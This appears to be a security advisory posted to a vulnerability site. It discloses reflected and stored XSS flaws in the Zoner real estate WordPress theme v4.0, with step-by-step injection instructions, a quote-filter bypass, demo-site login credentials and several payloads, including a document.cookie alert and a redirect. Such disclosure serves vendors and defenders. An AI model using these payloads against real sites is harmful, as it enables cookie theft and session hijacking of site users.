Zoner - Real Estate WordPress Theme v4.0 Reflected & Stored XSS Injections

2019.04.26
ru QUIXSS (RU) ru
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

[*] :: Title: Zoner - Real Estate WordPress Theme v4.0 Reflected & Stored XSS Injections [*] :: Author: QUIXSS [*] :: Date: 2019-04-26 [*] :: Software: Zoner - Real Estate WordPress Theme v4.0 [?] :: Technical Details & Description: # Weak security measures like bad input fields data filtering has been discovered in the «Zoner - Real Estate WordPress Theme». Current version of this WordPress Premium theme is 4.0. [?] :: Demo Website: # https://themeforest.net/item/zoner-real-estate-wordpress-theme/9099226 # Frontend: https://zoner.fruitfulcode.com/home_v/1/ # Backend (user): https://zoner.fruitfulcode.com/sign-in/ # Login/Password (user): natokebow@quickmail.best/CvfWo(SY [!] :: Special Note: # 1.575 Sales [!] :: For developers: # Disabling any data changes on a demo websites doesn't make your applications more secure. It's good for business and sales but you are simply double-crossing your clients. [+] :: PoC [Links]: # https://zoner.fruitfulcode.com/home_v/1/ (needs authorization) # https://zoner.fruitfulcode.com/author/quixss/?profile-page=my_profile (needs authorization) # http://tiny.cc/quixss (Reflected XSS with cookie alert) # http://tiny.cc/quixss2 (Reflected XSS with redirect) [+] :: PoC [Stored XSS Injection]: # Authorize on the demo website for tests as a regular user, then go to any page with a text field, f.e. https://zoner.fruitfulcode.com/author/quixss/?profile-page=my_profile # Inside any text field type "> first just to «close» an input field, then use your payload, save the data and your code will be successfully injected. For any text box instead of "> use </textarea> first and then your payload. # Sample payload #1: "><script>alert('QUIXSS')</script> # Sample payload #2: "><img src="x" onerror="alert('QUIXSS');"> [+] :: PoC [Reflected XSS Injection]: # Go to any page with the «Search Your Property» form, f.e. https://zoner.fruitfulcode.com/home_v/3/ and use your payload for Reflected XSS Injection inside the «Keyword» input field. Keep in mind that quotes will be filtered, but u can bypass it by using combination of ` quotes and «no quotes» (check the provided samples). # Sample payload #1: "><img src="x" onerror="alert(document.cookie)"> # Sample payload #2: "><img src="x" onerror=window.location.replace(`https://twitter.com/quixss`)>

References:

https://themeforest.net/item/zoner-real-estate-wordpress-theme/9099226


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top